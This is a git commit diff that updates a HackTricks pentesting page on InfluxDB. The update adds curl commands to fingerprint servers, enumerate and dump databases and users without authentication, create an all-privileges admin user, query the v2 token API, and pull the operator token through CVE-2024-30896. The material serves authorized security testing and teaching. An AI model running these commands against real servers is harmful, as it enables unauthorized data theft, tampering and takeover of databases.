Merge pull request #1526 from HackTricks-wiki/research_update_src_network-services-pentesting_8086-pentesting-influxdb_20251027_082736

carlospolop · web-flow · commit 36ffb70644a3 · 2025-11-07T06:09:37.000+01:00
Research Update Enhanced src/network-services-pentesting/808...
diff --git a/src/network-services-pentesting/8086-pentesting-influxdb.md b/src/network-services-pentesting/8086-pentesting-influxdb.md
@@ -13,6 +13,21 @@ PORT     STATE SERVICE VERSION
 8086/tcp open  http    InfluxDB http admin 1.7.5
 ```
 
+## Identify & Version (HTTP)
+
+- v1.x: `GET /ping` returns status 204 and headers like `X-Influxdb-Version` and `X-Influxdb-Build`.
+- v2.x+: `GET /health` returns JSON with the server version and status. Works without auth.
+
+```bash
+# v1 banner grab
+curl -i http://<host>:8086/ping
+
+# v2/compat health
+curl -s http://<host>:8086/health | jq .
+```
+
+Tip: exposed instances often also serve Prometheus-style metrics at `/metrics`.
+
 ## Enumeration
 
 From a pentester point of view this another database that could be storing sensitive information, so it's interesting to know how to dump all the info.
@@ -22,8 +37,8 @@ From a pentester point of view this another database that could be storing sensi
 InfluxDB might require authentication or not
 
 ```bash
-# Try unauthenticated
-influx -host 'host name' -port 'port #'
+# Try unauthenticated CLI (v1 shell)
+influx -host <host> -port 8086
 > use _internal
 ```
 
@@ -35,9 +50,50 @@ influx –username influx –password influx_pass
 
 There was a vulnerability influxdb that allowed to bypass the authentication: [**CVE-2019-20933**](https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933)
 
-### Manual Enumeration
+### Manual Enumeration (v1 HTTP API / InfluxQL)
+
+Even when no CLI is available, the HTTP API is usually exposed on port 8086.
+
+```bash
+# List databases (unauth)
+curl -sG "http://<host>:8086/query" --data-urlencode "q=SHOW DATABASES"
+
+# List retention policies of a DB
+curl -sG "http://<host>:8086/query" --data-urlencode "db=telegraf" --data-urlencode "q=SHOW RETENTION POLICIES ON telegraf"
+
+# List users (if auth disabled)
+curl -sG "http://<host>:8086/query" --data-urlencode "q=SHOW USERS"
 
-The information of this example was taken from [**here**](https://oznetnerd.com/2017/06/11/getting-know-influxdb/).
+# List measurements (tables)
+curl -sG "http://<host>:8086/query" --data-urlencode "db=telegraf" --data-urlencode "q=SHOW MEASUREMENTS"
+
+# List field keys (columns)
+curl -sG "http://<host>:8086/query" --data-urlencode "db=telegraf" --data-urlencode "q=SHOW FIELD KEYS"
+
+# Dump data from a measurement
+curl -sG "http://<host>:8086/query" \
+  --data-urlencode "db=telegraf" \
+  --data-urlencode 'q=SELECT * FROM "cpu" LIMIT 5' | jq .
+
+# Force epoch timestamps (useful for tooling)
+curl -sG "http://<host>:8086/query" \
+  --data-urlencode "epoch=ns" \
+  --data-urlencode "db=telegraf" \
+  --data-urlencode 'q=SELECT * FROM "cpu" LIMIT 5'
+```
+
+> [!WARNING]
+> In some testing with the authentication bypass it was noted that the name of the table needed to be between double quotes like: `select * from "cpu"`
+
+If authentication is disabled, you can even create users and escalate:
+
+```bash
+# Create an admin user (v1, auth disabled)
+curl -sG "http://<host>:8086/query" \
+  --data-urlencode "q=CREATE USER hacker WITH PASSWORD 'P@ssw0rd!' WITH ALL PRIVILEGES"
+```
+
+The information of the following CLI example was taken from [**here**](https://oznetnerd.com/2017/06/11/getting-know-influxdb/).
 
 #### Show databases
 
@@ -109,13 +165,60 @@ time                cpu       host   usage_guest usage_guest_nice usage_idle
 1497018760000000000 cpu1      ubuntu 0           0                99.69909729188728 0                   0         0          0                    0           0.20060180541622202 0.10030090270811101
 ```
 
-> [!WARNING]
-> In some testing with the authentication bypass it was noted that the name of the table needed to be between double quotes like: `select * from "cpu"`
+### InfluxDB v2.x API (Token-based)
+
+InfluxDB 2.x introduces token-based auth and a new API (still on 8086 by default). If you obtain a token (leaked logs, default deployments, backups) you can enumerate:
+
+```bash
+# Basic org, bucket, and auth discovery
+TOKEN="<token>"; H="-H Authorization: Token $TOKEN"
+
+# Health & version
+curl -s http://<host>:8086/health | jq .
+
+# List organizations
+curl -s $H http://<host>:8086/api/v2/organizations | jq .
+
+# List buckets
+curl -s $H 'http://<host>:8086/api/v2/buckets?limit=100' | jq .
+
+# List authorizations (requires perms)
+ORGID=<org_id>
+curl -s $H "http://<host>:8086/api/v2/authorizations?orgID=$ORGID" | jq .
+
+# Query data with Flux
+curl -s $H -H 'Accept: application/csv' -H 'Content-Type: application/vnd.flux' \
+  -X POST http://<host>:8086/api/v2/query \
+  --data 'from(bucket:"telegraf") |> range(start:-1h) |> limit(n:5)'
+```
+
+Notes
+- For v1.8+, some v2-compatible endpoints exist (`/api/v2/query`, `/api/v2/write`, `/health`). This is useful if the server is v1 but accepts v2-style requests.
+- In v2, the HTTP `Authorization` header must be in the form `Token <value>`.
 
-### Automated Authentication
+### Automated Enumeration
 
 ```bash
 msf6 > use auxiliary/scanner/http/influxdb_enum
 ```
 
+### Recent vulns and privesc of interest (last years)
+
+- InfluxDB OSS 2.x through 2.7.11 operator token exposure (CVE-2024-30896). Under specific conditions, an authenticated user with read access to the authorization resource in the default organization could list and retrieve the instance-wide operator token (e.g., via `influx auth ls` or `GET /api/v2/authorizations`). With that token, the attacker can administrate the instance (buckets, tokens, users) and access all data across orgs. Upgrade to a fixed build when available and avoid placing regular users in the default org. Quick test:
+
+```bash
+# Using a low-priv/all-access token tied to the default org
+curl -s -H 'Authorization: Token <user_or_allAccess_token>' \
+  'http://<host>:8086/api/v2/authorizations?orgID=<default_org_id>' | jq .
+# Look for entries of type "operator" and extract the raw token (if present)
+```
+
+- Many legacy 1.x deployments still expose `/query` and `/write` unauthenticated on the Internet. If auth is disabled, you can dump or even modify time-series at will; you may also create admin users as shown above. Always verify with the HTTP API even if the CLI blocks you.
+
+
+
+## References
+
+- InfluxData docs: InfluxDB v1/v2 HTTP API reference (endpoints like `/ping`, `/health`, `/query`, `/api/v2/authorizations`). <https://docs.influxdata.com/influxdb/v1/tools/api/>
+- CVE-2024-30896 operator token exposure in InfluxDB OSS 2.x. <https://www.wiz.io/vulnerability-database/cve/cve-2024-30896>
 {{#include ../banners/hacktricks-training.md}}
